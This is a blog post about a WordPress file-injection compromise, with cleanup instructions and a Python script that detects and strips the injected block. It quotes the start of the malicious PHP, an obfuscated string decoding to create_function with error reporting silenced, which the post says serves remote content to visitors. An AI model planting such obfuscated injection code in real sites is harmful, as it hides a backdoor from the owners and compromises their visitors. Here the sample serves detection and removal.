There is a new WordPress exploit going around. Those using security plugins like “Better WP Security” are NOT protected from the new exploit.
The new exploit will appear at the top of your files, beginning with:
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework(
Check your installations for this exploit. The exploit will display content retrieved from a remote server to website visitors. It is very important for your website's health to remove exploits like these immediately. The last thing you want is for Google to alert you that your site has been compromised.
The Vulnerability
I have yet to determine the vulnerability exploited. I will update this as soon as we have determined the vulnerability.
What to do if your site is affected
If your site has been compromised, you should immediately make a complete backup. If you are hosting multiple domains on your server, check all other websites on the server. ANY PHP files on the server can and will be affected by this exploit.
Option 1: Manual Find and Replace
- Download the entire website.
- Back up the files.
- Open a compromised file and copy the exploit code, from the PHP opening tag to the closing tag.
- Run a find and replace operation on all files.
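Option 1 can be scripted against the downloaded copy of the site. The following is an added example, not code from this post or from Oomta: it finds every .php file that begins with the marker quoted above and removes the injected block while keeping a backup. It assumes the injected block ends at the first closing tag; the function names, the .infected.bak suffix and the sample data are made up for illustration.

```python
import re
import sys
from pathlib import Path

# Start of the injected line as quoted on the page. The escaped string that
# follows it in the real sample decodes to "create_function".
MARKER = re.compile(rb'^\s*<\?php\s+\$zend_framework\s*=\s*"')

# Constructed sample: injected block (payload replaced by a placeholder)
# prepended to a legitimate PHP file.
SAMPLE = (b'<?php $zend_framework="PLACEHOLDER"; @error_reporting(0); '
          b'$zend_framework("", "PLACEHOLDER"); ?><?php\necho "hello";\n')

def is_infected(data: bytes) -> bool:
    """True if the file content begins with the injected block."""
    return MARKER.match(data) is not None

def strip_injection(data: bytes) -> bytes:
    """Drop the injected block, from its opening tag to its first closing tag."""
    if not is_infected(data):
        return data
    end = data.find(b"?>")
    if end == -1:  # assumption violated: do not guess, inspect by hand
        raise ValueError("injected block has no closing tag")
    return data[end + 2:]

def scan(root) -> list:
    """Return every .php file under root that starts with the marker."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        with open(path, "rb") as fh:
            if is_infected(fh.read(4096)):
                hits.append(path)
    return hits

def clean(root) -> list:
    """Back up each infected file next to itself, then rewrite it clean."""
    cleaned = []
    for path in scan(root):
        data = path.read_bytes()
        path.with_name(path.name + ".infected.bak").write_bytes(data)
        path.write_bytes(strip_injection(data))
        cleaned.append(path)
    return cleaned

if __name__ == "__main__":
    # Usage: python scan_zend.py /path/to/downloaded/site [--clean]
    action = clean if "--clean" in sys.argv[2:] else scan
    for hit in action(sys.argv[1]):
        print(hit)
```

Run it without --clean first and review the list of hits, then run scan again after cleaning to confirm nothing is left before uploading the files.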
Option 2: Oomta’s Fix
- Create a file using the contents here http://blog.oomta.com/wordpress-zend_framework-hack-fixed/
- Create a complete backup
- Upload the file to your domains root directory and open the file in your browser
- Confirm all files have been scrubbed
Oomta’s fix is a simple find and replace. The script will automatically create a backup of your files.